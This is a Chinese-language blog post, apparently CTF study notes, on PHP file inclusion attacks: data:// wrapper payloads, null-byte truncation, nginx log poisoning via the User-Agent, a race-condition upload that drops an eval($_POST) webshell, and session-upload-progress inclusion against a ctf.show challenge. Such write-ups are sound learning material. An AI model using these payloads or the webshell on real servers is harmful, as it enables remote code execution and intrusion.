<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="文件包含的条件和要求： 远程文件包含：allow_url_fopen &#x3D; On ​                        allow_url_include &#x3D; On 包含日志文件GetShell的要求： 利用条件：需要知道服务器日志的存储路径，且日志文件可读。 既然存在文件包含漏洞就可以利用漏洞读取apache的配置文件找到日志文件的位置。（默认：包含日志文件GetShell） ngin">
<meta property="og:type" content="article">
<meta property="og:title" content="文件包含漏洞">
<meta property="og:url" content="http://example.com/2021/04/20/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/index.html">
<meta property="og:site_name" content="Viking">
<meta property="og:description" content="文件包含的条件和要求： 远程文件包含：allow_url_fopen &#x3D; On ​                        allow_url_include &#x3D; On 包含日志文件GetShell的要求： 利用条件：需要知道服务器日志的存储路径，且日志文件可读。 既然存在文件包含漏洞就可以利用漏洞读取apache的配置文件找到日志文件的位置。（默认：包含日志文件GetShell） ngin">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2021/04/20/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB.assets/1506320720285.png!small">
<meta property="og:image" content="http://example.com/2021/04/20/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB.assets/15063207534809.png!small">
<meta property="og:image" content="file://D:\Typora\ctfshow爆破题.assets\image-20210414221004572.png?lastModify=1618859165">
<meta property="og:image" content="http://example.com/2021/04/20/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB.assets/1999159-20201010194658099-100509760.png">
<meta property="og:image" content="http://example.com/2021/04/20/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB.assets/1999159-20201010195459494-303350987.png">
<meta property="og:image" content="http://example.com/2021/04/20/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB.assets/1999159-20201010195935484-1603129676.png">
<meta property="og:image" content="http://example.com/2021/04/20/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB.assets/image-20210420005227750.png">
<meta property="og:image" content="http://example.com/2021/04/20/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB.assets/image-20210420020922027.png">
<meta property="og:image" content="http://example.com/2021/04/20/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB.assets/image-20210420020954692.png">
<meta property="og:image" content="http://example.com/2021/04/20/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB.assets/image-20210420020908941.png">
<meta property="article:published_time" content="2021-04-19T19:13:00.000Z">
<meta property="article:modified_time" content="2021-04-19T19:19:58.334Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="Web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2021/04/20/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB.assets/1506320720285.png!small">

<link rel="canonical" href="http://example.com/2021/04/20/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>文件包含漏洞 | Viking</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Viking</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/04/20/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Viking">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          文件包含漏洞
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2021-04-20 03:13:00 / Modified: 03:19:58" itemprop="dateCreated datePublished" datetime="2021-04-20T03:13:00+08:00">2021-04-20</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF-Web/" itemprop="url" rel="index"><span itemprop="name">CTF-Web</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><strong>文件包含的条件和要求：</strong></p>
<p>远程文件包含：<strong>allow_url_fopen = On</strong></p>
<p>​                        <strong>allow_url_include = On</strong></p>
<p>包含日志文件GetShell的要求：</p>
<p><strong>利用条件：</strong>需要知道服务器日志的存储路径，且日志文件可读。</p>
<p>既然存在文件包含漏洞就可以利用漏洞读取apache的配置文件找到日志文件的位置。（默认：包含日志文件GetShell）</p>
<p>nginx默认日志文件路径：/var/log/nginx/access.log</p>
<h2 id="常见伪协议的利用"><a href="#常见伪协议的利用" class="headerlink" title="常见伪协议的利用"></a>常见伪协议的利用</h2><h4 id="php伪协议"><a href="#php伪协议" class="headerlink" title="php伪协议"></a>php伪协议</h4><p><strong>拿到源码之后再进行base64解码</strong></p>
<p>首先归纳下常见的文件包含函数：include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 。</p>
<p><strong>环境概要：</strong></p>
<p>PHP.ini：</p>
<p>allow_url_fopen ：on  默认开启  该选项为on便是激活了 URL 形式的 fopen 封装协议使得可以访问 URL 对象文件等。</p>
<p>allow_url_include：off  默认关闭，该选项为on便是允许 包含URL 对象文件等。</p>
<p>为了能够尽可能的列举所有情况本次测试使用的PHP版本为&gt;=5.2 具体为5.2，5.3，5.5，7.0；PHP版本&lt;=5.2 可以使用%00进行截断。</p>
<p><strong>0x01 是否截断问题：</strong></p>
<p>情况一：不需要截断：</p>
<p><a target="_blank" rel="noopener" href="http://127.0.0.1/test.php?file=file:///c:/users/Thinking/desktop/flag.txt">http://127.0.0.1/test.php?file=file:///c:/users/Thinking/desktop/flag.txt</a></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>])</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>情况二：需要截断：</p>
<p>在php版本&lt;=5.2中进行测试是可以使用%00截断的。</p>
<p><a target="_blank" rel="noopener" href="http://127.0.0.1/test.php?file=file:///c:/users/Thinking/desktop/flag.txt%00">http://127.0.0.1/test.php?file=file:///c:/users/Thinking/desktop/flag.txt%00</a></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>].<span class="string">&#x27;.php&#x27;</span>)<span class="comment">//当读到%00时自动默认是字符串的结尾可以绕过后面的.php</span></span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><strong>【data://协议】</strong>(可以base64加密绕过)</p>
<p>经过测试官方文档上存在一处问题，经过测试PHP版本5.2，5.3，5.5，7.0；data:// 协议是是受限于allow_url_fopen的，官方文档上给出的是NO，所以要使用data://协议需要满足双on条件</p>
<p><strong>PHP.ini：</strong></p>
<p>data://协议必须双在on才能正常使用；</p>
<p>allow_url_fopen ：on</p>
<p>allow_url_include：on</p>
<p>参考自：<a target="_blank" rel="noopener" href="http://php.net/manual/zh/wrappers.data.php">http://php.net/manual/zh/wrappers.data.php</a>, 官方文档上allow_url_fopen应为yes。</p>
<p> <img src="%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB.assets/1506320720285.png!small" alt="data.png"></p>
<p><strong>测试现象：</strong></p>
<p><a target="_blank" rel="noopener" href="http://127.0.0.1/cmd.php?file=data://text/plain">http://127.0.0.1/cmd.php?file=data://text/plain</a>,<?php phpinfo()?></p>
<p>or</p>
<p><a target="_blank" rel="noopener" href="http://127.0.0.1/cmd.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=">http://127.0.0.1/cmd.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=</a></p>
<p>也可以：</p>
<p><a target="_blank" rel="noopener" href="http://127.0.0.1/cmd.php?file=data:text/plain">http://127.0.0.1/cmd.php?file=data:text/plain</a>,<?php phpinfo()?></p>
<p>or</p>
<p><a target="_blank" rel="noopener" href="http://127.0.0.1/cmd.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=">http://127.0.0.1/cmd.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=</a></p>
<p> <img src="%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB.assets/15063207534809.png!small" alt="ceshi.png"></p>
<p>##日志包含</p>
<p><img src="file://D:\Typora\ctfshow爆破题.assets\image-20210414221004572.png?lastModify=1618859165" alt="image-20210414221004572"></p>
<p><strong>日志包含原理：首先利用文件包含漏洞达到将日志文件包含到当前页面之中的效果，日志文件会对user-agent进行记录，所以我们可以在user-agent里面添加php代码，等到服务器解析这个文件，时代码就会造成执行任意命令的后果</strong></p>
<p><strong>payload：</strong>首先get传参</p>
<p>​                ?file=/var/log/nginx/access.log</p>
<p>​                然后进行bp抓包，之后再bp的user-agent中添加如下代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> system(<span class="string">&#x27;ls&#x27;</span>);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>​                可以看到里面有个fl0g.php文件，所以继续构造payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> system(<span class="string">&#x27;cat fl0g.php&#x27;</span>);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>##session文件包含</p>
<p>​    <strong>原理：</strong>利用修改cookie中的PHPSESSID达到创建一个session文件的作用，使得把我们需要执行的代码包含进去，然后进行文件包含操作，同时采用条件竞争上传文件，达到执行文件包含漏洞。</p>
<p>​    <strong>首先来聊一聊条件竞争文件上传</strong>：由于服务器端在处理不同用户的请求时是并发进行处理的，如果对这些并发操作处理不当的话会由于一些时序问题导致一些异常情况的发生。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;submit&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$ext_arr</span> = <span class="keyword">array</span>(<span class="string">&#x27;jpg&#x27;</span>,<span class="string">&#x27;png&#x27;</span>,<span class="string">&#x27;gif&#x27;</span>);</span><br><span class="line">    <span class="variable">$file_name</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>];<span class="comment">#文件在上传者机器上的文件名</span></span><br><span class="line">    <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>];<span class="comment">#保存的是文件上传到服务器临时文件夹之后的文件名</span></span><br><span class="line">    <span class="variable">$file_ext</span> = substr(<span class="variable">$file_name</span>,strrpos(<span class="variable">$file_name</span>,<span class="string">&quot;.&quot;</span>)+<span class="number">1</span>);</span><br><span class="line">    <span class="comment">#取出例如“flag.php”中.之后所有的字符，即文件的后缀名</span></span><br><span class="line">    <span class="variable">$upload_file</span> = UPLOAD_PATH . <span class="string">&#x27;/&#x27;</span> . <span class="variable">$file_name</span>;</span><br><span class="line">	<span class="comment">#在php中前面没有$的是一个define的常量，所以在这里我们不用管他，就当他是一个需要保存的文件路径。</span></span><br><span class="line">    <span class="keyword">if</span>(move_uploaded_file(<span class="variable">$temp_file</span>, <span class="variable">$upload_file</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(in_array(<span class="variable">$file_ext</span>,<span class="variable">$ext_arr</span>))&#123;</span><br><span class="line">             <span class="variable">$img_path</span> = UPLOAD_PATH . <span class="string">&#x27;/&#x27;</span>. rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">&quot;YmdHis&quot;</span>).<span class="string">&quot;.&quot;</span>.<span class="variable">$file_ext</span>;</span><br><span class="line">             rename(<span class="variable">$upload_file</span>, <span class="variable">$img_path</span>);</span><br><span class="line">             <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="variable">$msg</span> = <span class="string">&quot;只允许上传.jpg|.png|.gif类型文件！&quot;</span>;</span><br><span class="line">            unlink(<span class="variable">$upload_file</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">#其中的$ext_arr应该是一个白名单，对文件后缀进行筛选。如果不是白名单中的后缀，就会在数据库之中删除这个文件。</span></span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="variable">$msg</span> = <span class="string">&#x27;上传出错！&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​    这段代码的作用在于，先把文件上传到服务器之中，然后才对该文件进行白名单过滤，如果该文件不符合白名单的规范就会被删除。这个文件其实在服务器有一定的停留时间，所以我们可以利用这一段停留时间干一些我们想干的事情(<del>别想，当然不能rm-rf</del>)。因为我们不可能直接把一句话木马放入文件中，这样只会被删掉(<del>除非你单身一千年，连菜刀的速度可以比计算机处理文件的速度快</del>)；所以我们需要<strong>执行一个写入一句话木马的文件</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	<span class="variable">$file</span>=fopen(<span class="string">&quot;1.php&quot;</span>,<span class="string">&quot;w&quot;</span>);</span><br><span class="line">	<span class="variable">$string</span>=<span class="string">&#x27;&lt;?php @eval($_POST[&quot;test&quot;]); ?&gt;&#x27;</span>;</span><br><span class="line">	fwrite(<span class="variable">$file</span>,<span class="variable">$string</span>);</span><br><span class="line">	fcolse();</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>下面写一个简单的python脚本用来访问传输上去的文件。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1000000</span>):</span><br><span class="line">    url=<span class="string">&quot;xxxxxxxxx&quot;</span><span class="comment">#这里的url就是所要访问的文件的url地址</span></span><br><span class="line">    <span class="keyword">if</span> requests.get(url).status_code == <span class="number">200</span> :</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&#x27;200ok!&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>同时我们打开bp，选择无参数爆破并指定次数，同时启动python脚本和bp，直到显示200ok!就可以采用蚁剑或者菜刀进行连接。</p>
<p><strong>了解了竞争文件上传之后，我们来看看这个session文件包含，适用于无法上传文件的情况下</strong></p>
<p><img src="%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB.assets/1999159-20201010194658099-100509760.png" alt="img"></p>
<p><img src="%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB.assets/1999159-20201010195459494-303350987.png" alt="img"></p>
<p><img src="%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB.assets/1999159-20201010195935484-1603129676.png" alt="img"></p>
<p>最后一个设置代表，post请求后的文件，记录会被立刻清除。</p>
<p>这是几个有关session的默认配置，当这些默认配置没有被更改时，我们可以进行<strong>session文件包含</strong></p>
<p>用一道ctfshow的文件包含来做例子</p>
<p><img src="%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB.assets/image-20210420005227750.png" alt="image-20210420005227750"></p>
<p>首先，类似之前写过的一道命令执行的题目，我们需要自己写一个上传文件的html文件，代码如下</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">&quot;http://7781194c-e177-4542-945c-b06304458ece.challenge.ctf.show:8080/&quot;</span> <span class="attr">method</span>=<span class="string">&quot;POST&quot;</span> <span class="attr">enctype</span>=<span class="string">&quot;multipart/form-data&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;PHP_SESSION_UPLOAD_PROGRESS&quot;</span> <span class="attr">value</span>=<span class="string">&quot;123&quot;</span> /&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;file&quot;</span> <span class="attr">name</span>=<span class="string">&quot;file&quot;</span> /&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">value</span>=<span class="string">&quot;submit&quot;</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>其中讲解一下hidden这个type，这个是一个“隐藏信息”，用户是看不到这样的信息的，但是他会被传入到目标网址。</p>
<p>这个时候我们把它保存为一个网页文件，然后点击</p>
<p>抓包，这里我们添加一个 Cookie :PHPSESSID=flag   ，PHP将会在服务器上创建一个文件：/tmp/sess_flag”  （这里我们猜测session文件默认存储位置为/tmp），并在PHP_SESSION_UPLOAD_PROGRESS下添加需要执行的php语句</p>
<?php system('ls');?>

<p><img src="%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB.assets/image-20210420020922027.png"></p>
<p>然后我们进入题目环境，构造传参file=/tmp/sess_flag，然后抓包，随便传入一个参数进行爆破。</p>
<p><img src="%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB.assets/image-20210420020954692.png" alt="image-20210420020954692"></p>
<p>利用条件竞争文件上传，同时开启post和get的文件上传，然后注意观察get的回显，也就是文件包含的回显，然后就可以看到这个521长度了，然后查看回显就可以看到包含的文件</p>
<p><img src="%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB.assets/image-20210420020908941.png" alt="image-20210420020908941"></p>
<p>同理我们就可以进行更改语句来查看flag的内容</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> system(<span class="string">&#x27;cat fl0g.php&#x27;</span>);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/Web/" rel="tag"># Web</a>
          </div>

        


        
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E4%BC%AA%E5%8D%8F%E8%AE%AE%E7%9A%84%E5%88%A9%E7%94%A8"><span class="nav-number">1.</span> <span class="nav-text">常见伪协议的利用</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#php%E4%BC%AA%E5%8D%8F%E8%AE%AE"><span class="nav-number">1.0.1.</span> <span class="nav-text">php伪协议</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">1</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">categories</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
